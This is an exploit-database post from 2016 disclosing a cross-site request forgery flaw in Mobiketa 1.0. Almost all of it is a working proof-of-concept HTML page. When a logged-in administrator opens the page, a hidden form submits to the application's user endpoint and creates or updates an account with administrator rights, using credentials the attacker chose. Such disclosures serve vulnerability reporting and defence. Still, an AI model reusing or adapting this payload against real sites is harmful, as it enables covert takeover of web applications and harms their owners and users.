Mobiketa 1.0 Cross Site Request Forgery
Posted on 13 June 2016
<!-- # Exploit Title: Mobiketa - CSRF Add Admin Exploit # Date: 09/06/2016 # Exploit Author: Murat YILMAZLAR # Vendor Homepage: http://www.ynetinteractive.com/mobiketa/ # Version: 1.0 # Exploit: < -- bug code started -- > --> <html> <body> <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data"> <input type="hidden" name="is_admin" value="1" /> <input type="hidden" name="name" value="murat y" /> <input type="hidden" name="email" value="murrat@protonmail.com" /> <input type="hidden" name="username" value="murrat" /> <input type="hidden" name="password" value="123123123" /> <input type="hidden" name="id" value="15" /> <input type="hidden" name="update" value=" " /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- < -- end of the bug code -- > ######################### [+] Contact: http://twitter.com/muratyilmazlarr -->